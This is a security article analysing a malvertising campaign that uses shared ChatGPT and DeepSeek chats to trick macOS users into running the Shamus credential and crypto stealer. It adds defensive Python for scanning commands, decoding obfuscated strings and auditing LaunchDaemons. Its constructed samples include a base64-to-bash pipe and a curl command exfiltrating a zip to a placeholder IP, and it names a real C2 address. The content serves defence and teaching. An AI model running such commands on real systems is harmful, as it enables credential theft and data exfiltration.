A sophisticated malvertising campaign is exploiting ChatGPT and DeepSeek’s shared chat features to deliver credential-stealing malware to macOS users.
Threat actors are purchasing sponsored Google search results and redirecting victims to legitimate-looking LLM-generated chat sessions that contain obfuscated malicious commands, effectively bypassing platform-level safety mechanisms.
The attack begins when users search for common macOS troubleshooting queries, such as “how to clear storage on Mac.”
Sponsored Google search results direct victims to shared ChatGPT and DeepSeek chat links that appear benign but contain malicious terminal commands disguised as legitimate system maintenance instructions.
The commands are encoded in base64 to evade initial detection while maintaining plausible deniability.

Upon execution, the initial bash script performs several critical functions. It creates a password prompt loop that mimics legitimate macOS authentication, validates the entered password using dscl authentication checks, and stores the harvested credentials in /tmp/.pass.
The script then downloads the primary malware payload, a native macOS binary designed to steal sensitive data and establish persistence.
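The two behaviours described so far, a base64-encoded command piped into a shell and an inner script that checks a password with dscl and drops it under /tmp, are easy to spot once the encoded layer is peeled off. The following scanner is an added example, not code from the article or from the analysts it cites: it matches a small set of constructed indicator patterns against a command line, decodes any base64-looking blob it finds, and re-scans the decoded text. The sample commands, the inner script and the 203.0.113.10 address are all constructed for the demonstration; the campaign's actual commands are not reproduced here.

```python
import base64
import re

# Indicator patterns modelled on the behaviour the article describes
# (base64-to-shell pipe, dscl authentication check, /tmp dotfile drop,
# curl POST to a bare IP). Constructed regexes, not vendor signatures.
INDICATORS = {
    "base64_to_shell": re.compile(r"\bbase64\s+(?:-d|--decode)\b[^|]*\|\s*(?:ba|z)?sh\b"),
    "dscl_auth_check": re.compile(r"\bdscl\b.*\bauthonly\b"),
    "tmp_dotfile": re.compile(r"/(?:private/)?tmp/\.[A-Za-z0-9_.-]+"),
    "curl_post_to_ip": re.compile(
        r"\bcurl\b.*(?:-X\s*POST|-F\s|--data).*\b(?:\d{1,3}\.){3}\d{1,3}\b"
    ),
}

# A run of base64 alphabet characters long enough to be worth decoding.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_blobs(text):
    """Return the decoded text of every base64-looking blob that decodes to printable UTF-8."""
    decoded = []
    for match in B64_BLOB.finditer(text):
        try:
            inner = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except ValueError:  # bad padding/alphabet (binascii.Error) or not UTF-8
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in inner):
            decoded.append(inner)
    return decoded


def scan_command(command, depth=2):
    """Return sorted indicator names hit by a command line, recursing into
    decoded base64 blobs up to `depth` levels; nested hits get a 'decoded:' prefix."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(command)}
    if depth > 0:
        for inner in decode_blobs(command):
            hits.update(f"decoded:{h}" for h in scan_command(inner, depth - 1))
    return sorted(hits)


# Constructed samples for the demo; none of these is the campaign's real command.
INNER_SCRIPT = 'echo "Freeing up memory..."; dscl . -authonly demo_user X; cat /tmp/.pass'
SAMPLES = {
    "benign": "sudo purge && df -h /",
    "staged": "echo " + base64.b64encode(INNER_SCRIPT.encode()).decode() + " | base64 -d | bash",
    "exfil": "curl -X POST -H 'X-Id: demo' http://203.0.113.10/contact -F 'file=@/tmp/out.zip'",
}


def scan_samples():
    """Scan every constructed sample; returns {name: [indicator, ...]}."""
    return {name: scan_command(cmd) for name, cmd in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name}: {hits or 'clean'}")
```

The point of the recursion is that the outer command line carries only one weak signal (a base64 pipe into a shell); the strong signals, the dscl check and the /tmp dotfile, only appear after decoding, so a detector that inspects the literal command text misses them.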
Multi-Stage Malware: Shamus Stealer
Analysis reveals the downloaded payload is Shamus, a known info-stealer and cryptostealer malware that employs sophisticated obfuscation techniques to evade reverse engineering.
Figure caption: The shared chat includes instructions on how to run a terminal command in order to clean up your Mac’s memory.

The binary uses a multi-stage decoding process combining arithmetic operations with XOR encoding and a custom Base64-like decoder driven by a hash-table alphabet.
This approach prevents simple string extraction tools from revealing malware capabilities during static analysis.
Once executed, the malware performs environment checks to detect analysis sandboxes and virtualized environments.
If detection indicators are found, such as QEMU, VMware, or specific hardware serial numbers, the malware exits without executing its payload. The malware then hides the Terminal application to conceal ongoing malicious activity.
In the custom decoder, each character is looked up in the hash-table alphabet to obtain a 6-bit value. These 6-bit chunks are accumulated until at least 8 bits are available, at which point one output byte is emitted.
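A decoder of the kind described above is straightforward to reimplement once the alphabet table has been recovered from the binary, which is what an analyst needs in order to dump the obfuscated strings without running the sample. The code below is an added example, not the malware's own routine or code from the article: it implements the general table-driven, 6-bit-accumulating decoder for any 64-symbol alphabet, plus a matching encoder used only to construct test data. The shuffled CUSTOM_ALPHABET, the XOR key and the XOR layer standing in for the unspecified "arithmetic operations" stage are all assumptions made for the demonstration; the real sample's table and arithmetic are not reproduced here.

```python
STANDARD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# Constructed shuffled alphabet for the demo; not the sample's real table.
CUSTOM_ALPHABET = "zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA9876543210/+"


def build_table(alphabet):
    """Hash table mapping each alphabet symbol to its 6-bit value."""
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("alphabet must hold exactly 64 distinct symbols")
    return {ch: i for i, ch in enumerate(alphabet)}


def custom_b64_decode(text, alphabet):
    """Table-driven decode: look up 6 bits per symbol, emit a byte once 8 bits are buffered."""
    table = build_table(alphabet)
    acc, nbits, out = 0, 0, bytearray()
    for ch in text:
        if ch == "=":          # padding: trailing bits are discarded
            break
        if ch not in table:
            raise ValueError(f"symbol not in alphabet: {ch!r}")
        acc = (acc << 6) | table[ch]
        nbits += 6
        if nbits >= 8:
            nbits -= 8
            out.append((acc >> nbits) & 0xFF)
            acc &= (1 << nbits) - 1   # keep only the leftover bits
    return bytes(out)


def custom_b64_encode(data, alphabet):
    """Inverse of custom_b64_decode; used here only to build demo inputs."""
    out, acc, nbits = [], 0, 0
    for b in data:
        acc = (acc << 8) | b
        nbits += 8
        while nbits >= 6:
            nbits -= 6
            out.append(alphabet[(acc >> nbits) & 0x3F])
            acc &= (1 << nbits) - 1
    if nbits:                  # left-justify the leftover bits into a final symbol
        out.append(alphabet[(acc << (6 - nbits)) & 0x3F])
    while len(out) % 4:
        out.append("=")
    return "".join(out)


def xor_layer(data, key):
    """Repeating-key XOR; an assumed stand-in for the sample's arithmetic stage."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_obfuscated(blob, alphabet, key):
    """Full pipeline: custom base64 first, then the XOR layer, then UTF-8."""
    return xor_layer(custom_b64_decode(blob, alphabet), key).decode("utf-8")


# Constructed demo blob: the string "Terminal" XORed with a demo key, then
# encoded with the shuffled alphabet.
DEMO_KEY = b"\x5a\xa5\x3c"
DEMO_BLOB = custom_b64_encode(xor_layer(b"Terminal", DEMO_KEY), CUSTOM_ALPHABET)

if __name__ == "__main__":
    print("obfuscated:", DEMO_BLOB)
    print("recovered :", decode_obfuscated(DEMO_BLOB, CUSTOM_ALPHABET, DEMO_KEY))
```

With the standard alphabet the decoder behaves exactly like ordinary base64, which is a useful sanity check; with the shuffled table the same input decodes to unrelated bytes, which is why `strings` and a stock base64 decoder reveal nothing until the table is pulled from the binary.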

The malware’s primary payload is an 800-line AppleScript designed to extract sensitive data systematically.
It targets 12 different Chromium-based browsers (Chrome, Brave, Edge, Opera variants) and Firefox-based browsers, stealing cookies, browsing history, login credentials, and local storage data.
Cryptocurrency theft capabilities are particularly concerning. The malware specifically targets 200+ cryptocurrency wallet browser extensions, including MetaMask, and extracts entire extension directories and IndexedDB data.
For desktop wallets, it targets 15 different applications spanning Bitcoin Core, Electrum, Exodus, Ledger Live, and Trezor Suite.
The malware also harvests the complete macOS Keychain database, system information via system_profiler, Telegram session data, OpenVPN profiles, and files from Desktop, Documents, and Downloads folders with extensions including .wallet, .key, .json, and .db.
Persistence and Application Trojanization
To maintain access, the malware installs a LaunchDaemon that runs as root, executing a persistence agent that runs the bot binary every second with user privileges.
This ensures the malware survives system reboots and is automatically restarted if its process is terminated.
Most troublingly, the malware performs application trojanization, replacing legitimate cryptocurrency wallet applications, particularly Ledger Live, with compromised versions that intercept transactions and steal cryptocurrency even when users employ hardware wallets.
The C2 infrastructure communicates via HTTP POST requests to 45.94.47.205/contact, with stolen data packaged into ZIP archives and exfiltrated using curl with custom headers containing user identifiers and build IDs.
Organizations should educate users about the risks of clicking sponsored search results, implement endpoint detection and response solutions to identify malware execution patterns, and monitor for suspicious macOS LaunchDaemon installations.
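The persistence mechanism described above (a root LaunchDaemon that keeps a bot binary running) and the closing recommendation to monitor LaunchDaemon installations both come down to auditing launchd job definitions for a handful of traits. The script below is an added example, not code from the article: it parses a job plist with the standard-library plistlib module and flags program paths in hidden or user-writable locations, the KeepAlive plus RunAtLoad combination, very short StartInterval values, Apple-looking labels that point at non-system binaries, and inline shell in the argument list. The two embedded plists are constructed for the demo; the campaign's real plist is not on the page and is not reproduced.

```python
import plistlib
import re
from pathlib import Path

HIDDEN_COMPONENT = re.compile(r"/\.[^/]+")      # any dot-prefixed path component
USER_WRITABLE = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/")
SYSTEM_PREFIXES = ("/System/", "/usr/", "/Library/Apple/", "/sbin/", "/bin/")
INLINE_SHELL = re.compile(r"\b(?:curl|base64|osascript)\b")


def audit_launch_daemon(plist_bytes):
    """Return a list of (code, detail) findings for one launchd job definition."""
    job = plistlib.loads(plist_bytes)
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    program = args[0] if args else ""
    label = job.get("Label", "")
    findings = []

    if not program:
        findings.append(("no-program", "job defines neither Program nor ProgramArguments"))
    if HIDDEN_COMPONENT.search(program):
        findings.append(("hidden-path", program))
    if program.startswith(USER_WRITABLE):
        findings.append(("user-writable", program))
    if job.get("KeepAlive") and job.get("RunAtLoad"):
        findings.append(("keepalive-runatload", "relaunched on exit and at every boot"))
    interval = job.get("StartInterval")
    if isinstance(interval, int) and interval <= 5:
        findings.append(("short-interval", f"StartInterval={interval}s"))
    if label.startswith("com.apple.") and not program.startswith(SYSTEM_PREFIXES):
        findings.append(("apple-label-spoof", f"{label} -> {program}"))
    trailing = " ".join(str(a) for a in args[1:])
    if INLINE_SHELL.search(trailing):
        findings.append(("inline-shell", trailing))
    return findings


def audit_directory(directory="/Library/LaunchDaemons"):
    """Audit every .plist in a launchd directory; jobs in /Library/LaunchDaemons run as root."""
    report = {}
    for path in sorted(Path(directory).glob("*.plist")):
        try:
            report[path.name] = audit_launch_daemon(path.read_bytes())
        except (plistlib.InvalidFileException, OSError, KeyError, ValueError) as exc:
            report[path.name] = [("unreadable", str(exc))]
    return report


# Constructed sample plists for the demo.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.nightly-backup</string>
  <key>ProgramArguments</key>
  <array><string>/usr/local/bin/backup</string><string>--nightly</string></array>
  <key>StartCalendarInterval</key><dict><key>Hour</key><integer>2</integer></dict>
</dict></plist>"""

SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.demo.agent</string>
  <key>ProgramArguments</key>
  <array><string>/Users/Shared/.agent/run.sh</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_PLIST), ("suspicious", SUSPICIOUS_PLIST)):
        print(name, audit_launch_daemon(blob) or "no findings")
    # On a real host: print(audit_directory()) for /Library/LaunchDaemons,
    # and audit_directory("/Library/LaunchAgents") for per-user jobs.
```

None of these traits is malicious on its own (plenty of legitimate daemons set KeepAlive), so the output is meant to be triaged rather than alerted on directly; a program path under a hidden directory in a user-writable location combined with KeepAlive is the combination worth escalating.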
